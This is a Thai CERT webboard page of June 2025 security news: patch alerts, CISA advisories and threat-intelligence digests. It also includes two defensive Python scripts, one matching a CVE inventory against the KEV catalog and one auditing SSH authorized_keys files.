Follow the news on the webboard or the NCSA Thailand Facebook page

Posts created by NCSA_THAICERT
-
SAP releases June 2025 patches fixing NetWeaver vulnerabilities
-
Google fixes a serious vulnerability that risked leaking users' phone numbers
-
June 2025 Monthly Patch
On 11 June 2025, the Cyber Security Agency of Singapore (CSA) published an alert on Microsoft's monthly patch update, which fixes multiple security vulnerabilities, as follows:
Microsoft has released patches for vulnerabilities across its products that are rated Critical (CVSS 8.1–9.8), notably in:
- Power Automate (CVE‑2025‑47966): elevation of privilege, the highest score at 9.8
- SharePoint Server (CVE‑2025‑47172): remote code execution, 8.8
- Multiple Microsoft Word and Office vulnerabilities: RCE (around 8.4)
- Windows Schannel, Remote Desktop Services, Netlogon and KPSSVC: RCE and EoP vulnerabilities scored 8.1
Full details of the patches are available in the Microsoft Security Update Guide (June 2025 release notes).
Recommendations: administrators should apply the patches immediately, especially if they run the following products:
- Microsoft Word and Office (including SharePoint Server), Power Automate
- Windows Remote Desktop Services, Schannel, Netlogon, KDC Proxy Service (KPSSVC)
In addition:
- Verify systems after installing the patches to confirm that normal operation is not affected.
- Strengthen the patch management cycle in line with security best practice, such as testing before rollout and regular verification.
These vulnerabilities are highly severe and could allow attacks from outside (remote code execution or elevation of privilege), which may lead to system takeover or theft of sensitive data, so timely patching is very important.
Reference
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-058/
-
Sensata Technologies discloses the cause of a personal data breach following a ransomware attack
-
OpenAI bans ChatGPT accounts linked to cyber threat groups
-
CISA releases seven Industrial Control Systems advisories
On 5 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released seven Industrial Control Systems (ICS) advisories. These advisories provide timely information about current security issues, vulnerabilities and exploits surrounding ICS. They are:
ICSA-25-155-01 CyberData 011209 SIP Emergency Intercom
ICSA-25-155-02 Hitachi Energy Relion 670, 650 series and SAM600-IO Product
ICSA-21-049-02 Mitsubishi Electric FA Engineering Software Products (Update H)
ICSA-25-133-02 Hitachi Energy Relion 670/650/SAM600-IO Series (Update A)
ICSA-23-068-05 Hitachi Energy Relion 670, 650 and SAM600-IO Series (Update A)
ICSA-21-336-05 Hitachi Energy Relion 670/650/SAM600-IO (Update A)
ICSA-23-089-01 Hitachi Energy IEC 61850 MMS-Server (Update A)
CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations: https://www.cisa.gov/news-events/alerts/2025/06/05/cisa-releases-seven-industrial-control-systems-advisories
-
CISA adds two Known Exploited Vulnerabilities to its catalog
On 10 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. Vulnerabilities of this kind are frequent attack vectors for malicious cyber actors and pose significant risks to organizations. Details:
- CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability
- CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability
Reference
https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-adds-two-known-exploited-vulnerabilities-catalog
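A practical follow-up to a KEV addition is to check whether any CVE in your own vulnerability-scan export is now in the catalog and when its remediation due date falls. The script below is an added example, not code from the CISA alert: KEV_SAMPLE is a constructed excerpt in the catalog's JSON schema carrying the two CVEs above (the due dates are illustrative), INVENTORY is a constructed host/CVE list, and fetch_kev() downloads the live catalog from the published feed URL if you want to run the same check against real data.

```python
"""Cross-check a CVE inventory against the CISA Known Exploited Vulnerabilities catalog.

Added example (not from the CISA alert). KEV_SAMPLE is a constructed excerpt in the
catalog's JSON schema so the check runs offline; fetch_kev() retrieves the live feed.
"""
import json
import urllib.request
from datetime import date

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed excerpt: same field names as the real catalog, illustrative due dates.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2025.06.10",
    "dateReleased": "2025-06-10T00:00:00.0000Z",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2025-24016",
            "vendorProject": "Wazuh",
            "product": "Wazuh Server",
            "vulnerabilityName": "Wazuh Server Deserialization of Untrusted Data Vulnerability",
            "dateAdded": "2025-06-10",
            "dueDate": "2025-07-01",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2025-33053",
            "vendorProject": "Microsoft",
            "product": "Windows",
            "vulnerabilityName": "Web Distributed Authoring and Versioning (WebDAV) "
                                 "External Control of File Name or Path Vulnerability",
            "dateAdded": "2025-06-10",
            "dueDate": "2025-07-01",
            "knownRansomwareCampaignUse": "Unknown",
        },
    ],
})

# Constructed inventory: (hostname, CVE) pairs as a scanner export might list them.
# CVE-2025-47966 (Power Automate, from the same digest) is not in the sample catalog.
INVENTORY = [
    ("siem-01", "CVE-2025-24016"),
    ("ws-fin-07", "CVE-2025-33053"),
    ("ws-fin-09", "CVE-2025-33053"),
    ("flow-01", "CVE-2025-47966"),
]


def fetch_kev():
    """Download the live catalog text (network required; the offline demo does not call this)."""
    with urllib.request.urlopen(KEV_URL, timeout=30) as resp:
        return resp.read().decode("utf-8")


def index_kev(kev_text):
    """Map cveID -> catalog entry."""
    return {v["cveID"]: v for v in json.loads(kev_text)["vulnerabilities"]}


def match_inventory(kev_text, inventory, today=None):
    """One finding per (host, CVE) pair present in KEV, most urgent due date first."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    today = today or date.today()
    kev = index_kev(kev_text)
    findings = []
    for host, cve in inventory:
        entry = kev.get(cve)
        if entry is None:
            continue                      # not known-exploited: normal patch cadence
        due = date.fromisoformat(entry["dueDate"])
        findings.append({
            "host": host,
            "cve": cve,
            "product": f'{entry["vendorProject"]} {entry["product"]}',
            "due": entry["dueDate"],
            "days_left": (due - today).days,   # negative means overdue
            "ransomware": entry["knownRansomwareCampaignUse"],
        })
    findings.sort(key=lambda f: (f["days_left"], f["host"]))
    return findings


def summarize(findings):
    """Hosts affected per KEV CVE, for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f["cve"]] = counts.get(f["cve"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = match_inventory(KEV_SAMPLE, INVENTORY, "2025-06-11")
    for f in hits:
        print(f'{f["host"]:10} {f["cve"]:16} due {f["due"]} ({f["days_left"]:+d} d) {f["product"]}')
    print(summarize(hits))
```

To run against the real catalog, replace KEV_SAMPLE with fetch_kev() and INVENTORY with your scanner's output; the catalog's dueDate is the deadline CISA sets for federal agencies, which is a reasonable internal SLA for anyone else.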
-
CISA releases four Industrial Control Systems advisories
On 10 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released four Industrial Control Systems (ICS) advisories. These advisories provide timely information about current security issues, vulnerabilities and exploits surrounding ICS. They are:
ICSA-25-160-01 SinoTrack GPS Receiver
ICSA-25-160-02 Hitachi Energy Relion 670, 650, SAM600-IO Series
ICSMA-25-160-01 MicroDicom DICOM Viewer
ICSA-25-140-11 Assured Telematics Inc (ATI) Fleet Management System (Update A)
CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.
Reference
https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-releases-four-industrial-control-systems-advisories
-
Cyber Threat Intelligence 11 June 2025
Financial Sector
- DDoS Attacks On Financial Sector Surge In Scale And Sophistication
"The financial industry has been particularly affected by large-scale distributed denial-of-service (DDoS) attacks for years, but the recent escalating sophistication of these attacks marks a shift, according to the Financial Services Information Sharing and Analysis Center (FS-ISAC). In a report published on June 10, in collaboration with Akamai, the financial sector’s threat intelligence sharing body revealed that the industry has experienced an almost exponential rise in DDoS attacks between 2014 and 2024. From a residual amount of monthly volumetric DDoS attacks in 2014, the sector faced a peak of almost 350 events in October 2024 – with each event including hundreds, millions or billions of individual malicious requests."
https://www.infosecurity-magazine.com/news/ddos-financial-sector-surge/
Healthcare Sector
- MicroDicom DICOM Viewer
"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer."
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-160-01
Industrial Sector
- SinoTrack GPS Receiver
"Successful exploitation of these vulnerabilities could allow an attacker to access device profiles without authorization through the common web management interface. Access to the device profile may allow an attacker to perform some remote functions on connected vehicles such as tracking the vehicle location and disconnecting power to the fuel pump where supported."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-160-01
- Threat Landscape For Industrial Automation Systems. Regions, Q1 2025
"In the first quarter of 2025, the global percentage of ICS computers on which malicious objects were blocked remained unchanged at 21.9%. Regionally, the percentage varied from 10.7% in Northern Europe to 29.6% in Africa."
https://ics-cert.kaspersky.com/publications/reports/2025/06/10/threat-landscape-for-industrial-automation-systems-regions-q1-2025/
- Hitachi Energy Relion 670, 650, SAM600-IO Series
"Successful exploitation of this vulnerability could allow an attacker to decrypt application data in transit."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-160-02
Vulnerabilities
- SAP Security Notes: June 2025 Patch Day
"SAP has published nineteen new and updated SAP Security Notes in its June Patch Day, including two HotNews Notes and seven High Priority Notes. Two of the fourteen new Security Notes were published in contribution with the Onapsis Research Labs."
https://onapsis.com/blog/sap-security-notes-june-2025-patch-day/
https://www.securityweek.com/critical-vulnerability-patched-in-sap-netweaver/
https://securityaffairs.com/178851/security/sap-june-2025-security-patch-day-fixed-critical-netweaver-bug.html
- Microsoft June 2025 Patch Tuesday Fixes Exploited Zero-Day, 66 Flaws
"Today is Microsoft's June 2025 Patch Tuesday, which includes security updates for 66 flaws, including one actively exploited vulnerability and another that was publicly disclosed. This Patch Tuesday also fixes ten "Critical" vulnerabilities, eight being remote code execution vulnerabilities and two being elevation of privileges bugs."
https://www.bleepingcomputer.com/news/microsoft/microsoft-june-2025-patch-tuesday-fixes-exploited-zero-day-66-flaws/
https://blog.talosintelligence.com/microsoft-patch-tuesday-june-2025/
https://cyberscoop.com/microsoft-patch-tuesday-june-2025/
https://www.securityweek.com/microsoft-patch-tuesday-covers-webdav-flaw-marked-as-already-exploited/
https://hackread.com/june-2025-patch-tuesday-microsoft-bugs-active-0-day/
- Five Zero-Days, 15 Misconfigurations Found In Salesforce Industry Cloud
"Security researchers have discovered five zero-day vulnerabilities and a further 15 easy misconfigurations in Salesforce Industry Cloud, potentially affecting tens of thousands of organizations. Salesforce Industry Cloud (aka Salesforce Industries) comprises a collection of industry-specific tools able to easily build custom CRM extension solutions for different industry sectors – such as healthcare, financial services, manufacturing, communications, and government public sector organizations. The process is built on the technology Salesforce acquired with its purchase of Vlocity in June 2020 and the use of OmniStudio low-code tools."
https://www.securityweek.com/five-zero-days-15-misconfigurations-found-in-salesforce-industry-cloud/
https://go.appomni.com/hubfs/Research/Salesforce-Industry-Clouds-Low-Code-High-Stakes.pdf
https://thehackernews.com/2025/06/researchers-uncover-20-configuration.html
- Code Execution Flaws Haunt Adobe Acrobat Reader, Adobe Commerce
"Software maker Adobe on Tuesday flagged critical-severity flaws in multiple product lines, including code execution bugs in Adobe Acrobat Reader and Adobe Commerce. The bumper Patch Tuesday rollout is headlined by an Acrobat Reader bulletin that documents at least 10 vulnerabilities affecting both Windows and macOS platforms. According to Adobe, four of the 10 bugs are rated critical with a CVSS severity score of 7.8/10."
https://www.securityweek.com/code-execution-flaws-haunt-adobe-acrobat-reader-adobe-commerce/
https://thehackernews.com/2025/06/adobe-releases-patch-fixing-254.html
- CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability
CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-adds-two-known-exploited-vulnerabilities-catalog
- Another Crack In The Chain Of Trust: Uncovering (Yet Another) Secure Boot Bypass
"In this blog post, the Binarly Research team documents a Secure Boot bypass that likely impacts most devices supporting UEFI. At the center of this discovery is CVE-2025-3052 (BRLY-2025-001), a memory corruption vulnerability in a module signed with Microsoft’s third-party UEFI certificate. Attackers can exploit this vulnerability to run unsigned code during the boot process, effectively bypassing Secure Boot and compromising the system’s chain of trust. Because the attacker’s code executes before the operating system even loads, it opens the door for attackers to install bootkits and undermine OS-level security defenses."
https://www.binarly.io/blog/another-crack-in-the-chain-of-trust
https://www.bleepingcomputer.com/news/security/new-secure-boot-flaw-lets-attackers-install-bootkit-malware-patch-now/
- Ivanti Workspace Control Hardcoded Key Flaws Expose SQL Credentials
"Ivanti has released security updates to fix three high-severity hardcoded key vulnerabilities in the company's Workspace Control (IWC) solution. IWC helps enterprise admins manage desktops and applications, acting as an intermediary between the operating system and users and regulating access and workspace configuration. It provides centralized control over user workspaces and dynamically configures desktops, applications, and user settings based on policies and user roles."
https://www.bleepingcomputer.com/news/security/ivanti-workspace-control-hardcoded-key-flaws-expose-sql-credentials/
- Android Enterprise Rolls Out Security And Productivity Updates
"Android Enterprise has announced a range of new features aimed at improving mobile security, streamlining device management and enhancing user productivity. The updates come as more businesses rely on mobile platforms for daily operations, raising the stakes for both usability and cybersecurity."
https://www.infosecurity-magazine.com/news/android-enterprise-security-updates/
Malware
- The Evolution Of Linux Binaries In Targeted Cloud Operations
"Unit 42 researchers have identified a growing threat to cloud security: Linux Executable and Linkage Format (ELF) files that threat actors are developing to target cloud infrastructure. We predict that threat actors targeting cloud environments will start using more complex tools in their exploits. This will include reworking, improving and tailoring existing tools that historically only targeted Linux operating systems (OS). The ELF malware samples threat actors use will include backdoors, droppers, remote access Trojans (RATs), data wipers and vulnerability-exploiting binaries."
https://unit42.paloaltonetworks.com/elf-based-malware-targets-cloud/
- Eggs In a Cloudy Basket: Skeleton Spider’s Trusted Cloud Malware Delivery
"Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations. In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment."
https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/
https://www.bleepingcomputer.com/news/security/fin6-hackers-pose-as-job-seekers-to-backdoor-recruiters-devices/
https://thehackernews.com/2025/06/fin6-uses-aws-hosted-fake-resumes-on.html
- Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day
"The operation deployed a sophisticated custom loader and implant designed to evade detection, hinder analysis, and selectively activate only on valuable targets. In March 2025, Check Point Research uncovered an attempted cyber attack against a major defense organization in Turkey. The attackers used a previously unknown remote code execution vulnerability in Windows to execute files from a remote WebDAV server they controlled, exploiting a legitimate built-in Windows tool to run malicious code silently. Following responsible disclosure, Microsoft assigned the vulnerability CVE-2025-33053 and released a patch on June 10, 2025, as part of their monthly Patch Tuesday updates."
https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/
https://therecord.media/microsoft-cisa-zero-day-turkish-defense-org
https://www.darkreading.com/vulnerabilities-threats/stealth-falcon-apt-exploits-microsoft-rce-zero-day-mideast
- Demystifying Myth Stealer: A Rust Based InfoStealer
"During regular proactive threat hunting, the Trellix Advanced Research Center identified a fully undetected infostealer malware sample written in Rust. Upon further investigation, we discovered that it was Myth Stealer which was being marketed on Telegram since late December 2024. Initially, it was offered for free for trial, and later evolved to a subscription-based model. Our investigation revealed that this infostealer is distributed through various fraudulent gaming websites. Upon execution, the malware displays a fake window to appear legitimate while simultaneously decrypting and executing malicious code in the background."
https://www.trellix.com/en-in/blogs/research/demystifying-myth-stealer-a-rust-based-infostealer/
https://thehackernews.com/2025/06/rust-based-myth-stealer-malware-spread.html
Breaches/Hacks/Leaks
- Peep Show: 40K IoT Cameras Worldwide Stream Secrets To Anyone With a Browser
"Security researchers managed to access the live feeds of 40,000 internet-connected cameras worldwide and they may have only scratched the surface of what's possible. Supporting the bulletin issued by the Department of Homeland Security (DHS) earlier this year, which warned of exposed cameras potentially being used in Chinese espionage campaigns, the team at Bitsight was able to tap into feeds of sensitive locations. The US was the most affected region, with around 14,000 of the total feeds streaming from the country, allowing access to the inside of datacenters, healthcare facilities, factories, and more."
https://www.theregister.com/2025/06/10/40000_iot_cameras_exposed/
- Mastery Schools Notifies 37,031 Of Major Data Breach
"A ransomware attack that compromised the personal data of 37,031 people has been confirmed by Mastery Schools, the largest charter school network in Philadelphia. The breach, which occurred in September 2024, exposed a wide range of sensitive information, including Social Security numbers, medical details and student records."
https://www.infosecurity-magazine.com/news/mastery-schools-data-breach/
General News
- The Legal Questions To Ask When Your Systems Go Dark
"At Span Cyber Security Arena, I sat down with Iva Mišković, Partner at the ISO-certified Mišković & Mišković law firm, to discuss the role of legal teams during cyber incidents. She shared why lawyers should assume the worst, coordinate quickly, and ask the right questions to support IT. Mišković explained that a legal strategy, built on understanding tech workflows, helps lawyers build trust with CISOs and respond to cyber threats."
https://www.helpnetsecurity.com/2025/06/10/iva-miskovic-law-firm-cyber-legal-stategy/
- AI Threats Leave SecOps Teams Burned Out And Exposed
"Security teams are leaning hard into AI, and fast. A recent survey of 500 senior cybersecurity pros at big U.S. companies found that 86% have ramped up their AI use in the past year. The main reason? They’re trying to keep up with a surge in AI-powered attacks. But even as AI tools help with tasks like threat detection and data analysis, the pressure on security teams is getting worse. Nearly 70% of respondents say AI and other emerging technologies are actually contributing to burnout. The findings come from the 2025 edition of the Voice of SecOps report, based on responses from organizations in finance, technology, manufacturing, healthcare, government, and critical infrastructure."
https://www.helpnetsecurity.com/2025/06/10/ai-powered-attacks-secops-teams/
- Cloud And AI Drive Efficiency, But Open Doors For Attackers
"AI adoption is increasing, with 84% of organizations now using AI in the cloud, according to Orca Security. But this innovation comes with new risks: 62% of organizations have at least one vulnerable AI package, and some of the most prevalent AI-related CVEs enable remote code execution. “While multi-cloud architectures offer outstanding flexibility and growth, it also makes it harder to maintain consistent visibility and coverage across environments. Add AI adoption to the mix, with organizations rushing to run vulnerable packages in the cloud, and you have a uniquely difficult environment for security professionals,” said Gil Geron, CEO, Orca Security."
https://www.helpnetsecurity.com/2025/06/10/ai-adoption-cloud-risks/
- Five Plead Guilty To Laundering $36 Million Stolen In Investment Scams
"Five men from China, the United States, and Turkey pleaded guilty to their involvement in an international crime ring and laundering nearly $37 million stolen from U.S. victims in cryptocurrency investment scams carried out from Cambodia. Accomplices living abroad reached out to targets in the United States via unsolicited social media, phone calls, text messages, and online dating services to gain their trust, promoting fraudulent digital asset investments and falsely claiming that the victims' funds' value increased after they tricked them into investing, when, in fact, their money was stolen."
https://www.bleepingcomputer.com/news/security/five-plead-guilty-to-laundering-36-million-stolen-in-investment-scams/
https://therecord.media/guilty-pleas-cambodia-cyber-scams
- 44% Of People Encounter a Mobile Scam Every Single Day, Malwarebytes Finds
"It’s become so troublesome owning a phone. Malicious texts pose as package delivery notifications, phishing emails impersonate trusted brands, and unknown calls hide extortion attempts, virtual kidnapping schemes, or AI threats. Confusingly, even legitimate businesses now lean on outreach tactics that have long been favored by online scammers—asking people to scan QR codes, download mobile apps, and trade direct messages with, essentially, strangers."
https://www.malwarebytes.com/blog/scams/2025/06/44-of-people-encounter-a-mobile-scam-every-single-day-malwarebytes-finds
- Email Threat Radar – June 2025
"During May, Barracuda threat analysts identified several notable email-based threats targeting organizations around the world and designed to evade detection and boost the chances of success, including:"
https://blog.barracuda.com/2025/06/10/email-threat-radar-june-2025
- The Hidden Threat In Your Stack: Why Non-Human Identity Management Is The Next Cybersecurity Frontier
"Modern enterprise networks are highly complex environments that rely on hundreds of apps and infrastructure services. These systems need to interact securely and efficiently without constant human oversight, which is where non-human identities (NHIs) come in. NHIs — including application secrets, API keys, service accounts, and OAuth tokens — have exploded in recent years, thanks to an ever-expanding array of apps and services that must work together and identify one another on the fly. In some enterprises, NHIs now outnumber human identities by as much as 50-to-1."
https://thehackernews.com/2025/06/the-hidden-threat-in-your-stack-why-non.html
- Cyber Risks Take Flight, Navigating The Evolving Threat Landscape In The Travel Industry
"The global travel industry is flying high once again, but alongside its recovery comes a surge in digital turbulence. As travel demand surges and operations digitize at an unprecedented rate, cyber criminals are seizing new opportunities to exploit vulnerabilities in this data-rich, highly interconnected sector. A new report from Check Point shows that from 2023 to 2025, cyber attacks targeting travel and tour operators surged dramatically."
https://blog.checkpoint.com/research/cyber-risks-take-flight-navigating-the-evolving-threat-landscape-in-the-travel-industry/
- ConnectWise Rotating Code Signing Certificates Over Security Concerns
"ConnectWise is warning customers that it is rotating the digital code signing certificates used to sign ScreenConnect, ConnectWise Automate, and ConnectWise RMM executables over security concerns. Digital certificates are used to sign executables so those downloading the files know they come from a trusted source. This ensures that code has not been tampered with before it reaches the end user. According to ConnectWise, the decision was taken after a third-party security researcher raised concerns about how certain configuration data can be abused by threat actors."
https://www.bleepingcomputer.com/news/security/connectwise-rotating-code-signing-certificates-over-security-concerns/
- AI Is a Data-Breach Time Bomb, Reveals New Report
"AI is everywhere. Copilots help employees boost productivity, and agents provide front-line customer support. LLMs enable businesses to extract deep insights from their data. Once unleashed, however, AI acts like a hungry Pac-Man, scanning and analyzing all the data it can grab. If AI surfaces critical data where it doesn’t belong, it’s game over. Data can’t be unbreached. And AI isn’t alone — sprawling cloud complexities, unsanctioned apps, missing MFA, and more risks are creating a ticking time bomb for enterprise data. Organizations that lack proper data security measures risk a catastrophic breach of their sensitive information."
https://www.bleepingcomputer.com/news/security/ai-is-a-data-breach-time-bomb-reveals-new-report/
https://info.varonis.com/en/state-of-data-security-report-2025
- SSH Keys: The Most Powerful Credential You're Probably Ignoring
"Secure Shell (SSH) keys are the backbone of secure remote access. They are everywhere, powering DevOps pipelines, enabling server management, and automating everything from deployments to patching. But despite their ubiquity, SSH keys often remain a blind spot in enterprise security. Why? Because unlike passwords, they don't expire. They are easy to create, hard to track, and alarmingly simple to forget."
https://www.darkreading.com/vulnerabilities-threats/ssh-keys-powerful-credential-ignoring
- Software Supply Chain Attacks Surged In April And May
"IT and software supply chain incidents have been trending higher in recent months, as threat actors have become more adept at exploiting the interconnected hardware, software, and services that comprise modern IT environments. An analysis of Cyble data reveals that software supply chain attacks have increased from an average of just under 13 a month during the eight months of February-September 2024 to just over 16 a month from October 2024 to May 2025, an increase of 25% in the most recent eight-month period. The last two months have averaged nearly 25 cyberattacks with supply chain impact, representing a near-doubling of supply chain attacks if the recent trend continues (chart below)."
https://cyble.com/blog/supply-chain-attacks-surge-in-april-may-2025/
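The SSH keys item above makes the point that keys never expire and are hard to track, so the first step is an inventory. The script below is an added example, not code from the Dark Reading article: it parses an OpenSSH authorized_keys file, reads the key size out of the base64 public-key blob, and flags the entries a reviewer would want to see, namely DSA keys, RSA keys shorter than 2048 bits, and keys that carry no from=, command= or restrict option. The sample file is constructed inside the script (its key blobs are well-formed but not real keys), and the 2048-bit threshold and the set of restricting options are this example's choices.

```python
"""Inventory and hygiene check for OpenSSH authorized_keys files (added example,
not code from the article). Flags DSA keys, RSA keys under 2048 bits and entries
with no from=, command= or restrict option. The sample file is constructed in
code: its key blobs are syntactically valid but are not real keys."""
import base64
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}
RESTRICTING_OPTIONS = {"from", "command", "restrict"}   # this example's policy
MIN_RSA_BITS = 2048


def _read_string(blob, off):
    """Read one SSH wire-format string (uint32 length prefix): (bytes, next offset)."""
    (length,) = struct.unpack_from(">I", blob, off)
    return blob[off + 4:off + 4 + length], off + 4 + length


def key_bits(blob):
    """Key size in bits, taken from the decoded public-key blob."""
    keytype, off = _read_string(blob, 0)
    keytype = keytype.decode()
    if keytype == "ssh-rsa":
        _e, off = _read_string(blob, off)                                     # exponent, skipped
        return int.from_bytes(_read_string(blob, off)[0], "big").bit_length()  # modulus n
    if keytype == "ssh-dss":
        return int.from_bytes(_read_string(blob, off)[0], "big").bit_length()  # prime p
    if keytype == "ssh-ed25519":
        return 256
    if keytype.startswith("ecdsa-sha2-nistp"):
        return int(keytype[len("ecdsa-sha2-nistp"):])
    raise ValueError(f"unsupported key type {keytype}")


def _split(text, sep=None):
    """Split on sep (None = whitespace), ignoring separators inside double quotes."""
    parts, cur, quoted = [], [], False
    for ch in text:
        quoted ^= (ch == '"')
        is_sep = ch.isspace() if sep is None else ch == sep
        if is_sep and not quoted:
            if cur:
                parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur:
        parts.append("".join(cur))
    return parts


def parse_entry(line):
    """Parse one authorized_keys line: [options] keytype base64 [comment]."""
    tokens = _split(line.strip())
    if tokens[0] in KEY_TYPES:
        opts, keytype, b64, comment = [], tokens[0], tokens[1], tokens[2:]
    else:
        opts = [o.split("=", 1)[0].strip().lower() for o in _split(tokens[0], ",")]
        keytype, b64, comment = tokens[1], tokens[2], tokens[3:]
    bits = key_bits(base64.b64decode(b64))
    findings = []
    if keytype == "ssh-dss":
        findings.append("DSA key (disabled by default since OpenSSH 7.0)")
    if keytype == "ssh-rsa" and bits < MIN_RSA_BITS:
        findings.append(f"RSA modulus only {bits} bits")
    if not RESTRICTING_OPTIONS & set(opts):
        findings.append("no from=/command=/restrict option: unrestricted login")
    return {"type": keytype, "bits": bits, "options": opts,
            "comment": " ".join(comment), "findings": findings}


def audit(text):
    """Parse every non-blank, non-comment line of an authorized_keys file."""
    report = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.strip() and not line.lstrip().startswith("#"):
            report.append(dict(parse_entry(line), line=lineno))
    return report


# Constructed sample data: syntactically valid blobs, not real keys.
def _s(b):
    return struct.pack(">I", len(b)) + b


def _mpint(n):
    return _s(n.to_bytes((n.bit_length() + 8) // 8, "big"))   # leading 0x00 if top bit set


def make_blob(keytype, bits):
    if keytype == "ssh-rsa":
        return _s(b"ssh-rsa") + _mpint(65537) + _mpint((1 << (bits - 1)) | 1)
    if keytype == "ssh-dss":
        return _s(b"ssh-dss") + _mpint((1 << (bits - 1)) | 1) + _mpint((1 << 159) | 1) + _mpint(2) + _mpint(3)
    return _s(b"ssh-ed25519") + _s(bytes(32))


def _entry(options, keytype, bits, comment):
    b64 = base64.b64encode(make_blob(keytype, bits)).decode()
    return " ".join(t for t in (options, keytype, b64, comment) if t)


SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    _entry("", "ssh-rsa", 1024, "legacy-backup@old-host"),
    _entry('from="10.0.0.0/8",command="/usr/local/bin/deploy",no-pty', "ssh-ed25519", 256, "ci-deploy"),
    _entry("", "ssh-dss", 1024, "dsa-2012"),
    _entry("restrict", "ssh-rsa", 3072, "admin@laptop"),
])

if __name__ == "__main__":
    for e in audit(SAMPLE_AUTHORIZED_KEYS):
        print(f'line {e["line"]}: {e["type"]} {e["bits"]}-bit {e["comment"]!r} -> {e["findings"] or "ok"}')
```

Run audit() over the real files (`~/.ssh/authorized_keys` for every account, plus any AuthorizedKeysFile paths set in sshd_config) and the output becomes the inventory the article says most organizations lack; the comment field is usually the only clue to who owns a key, which is itself a finding when it is empty.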
Reference
Electronic Transactions Development Agency (ETDA) - DDoS Attacks On Financial Sector Surge In Scale And Sophistication
-
FBI warns that BadBox 2.0 has infected millions of IoT devices worldwide
-
New Mirai variant targets TBK-brand video recorders
-
Cyber Threat Intelligence 10 June 2025
New Tooling
- Fiddleitm: Open-Source Mitmproxy Add-On Identifies Malicious Web Traffic
"fiddleitm is an open-source tool built on top of mitmproxy that helps find malicious web traffic. It works by checking HTTP requests and responses for known patterns that might point to malware, phishing, or other threats. “I created fiddleitm because I needed a replacement for a similar project I ran for years using Fiddler. It needed to be cross platform compatible and highly extensible. This is a web proxy and debugging tool by a security researcher, for security researchers,” Jérôme Segura, the creator of the tool, told Help Net Security."
https://www.helpnetsecurity.com/2025/06/09/fiddleitm-open-source-mitmproxy-add-on-identify-malicious-web-traffic/
https://github.com/jeromesegura/fiddleitm
Vulnerabilities
- PayU Plugin Flaw Allows Account Takeover On 5000 WordPress Sites
"A critical vulnerability in the PayU CommercePro plugin has put thousands of WordPress sites at risk by allowing unauthenticated attackers to hijack user accounts, according to PatchStack. The flaw, discovered in version 3.8.5, stems from insecure logic in the /payu/v1/get-shipping-cost API route. Attackers can exploit this to impersonate any registered user, including site administrators, without needing login credentials."
https://www.infosecurity-magazine.com/news/payu-plugin-flaw-wordpress-account/
https://patchstack.com/database/wordpress/plugin/payu-india/vulnerability/wordpress-payu-india-plugin-3-8-5-account-takeover-vulnerability
- Over 84,000 Roundcube Instances Vulnerable To Actively Exploited Flaw
"Over 84,000 Roundcube webmail installations are vulnerable to CVE-2025-49113, a critical remote code execution (RCE) flaw with a public exploit. The flaw, which impacts Roundcube versions 1.1.0 through 1.6.10, spanning over a decade, was patched on June 1, 2025, following its discovery and reporting by security researcher Kirill Firsov. The bug stems from unsanitized $_GET['_from'] input, enabling PHP object deserialization and session corruption when session keys begin with an exclamation mark."
https://www.bleepingcomputer.com/news/security/over-84-000-roundcube-instances-vulnerable-to-actively-exploited-flaw/
https://www.helpnetsecurity.com/2025/06/09/roundcube-rce-dark-web-activity-signals-imminent-attacks-cve-2025-49113/
- CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-32433 Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability
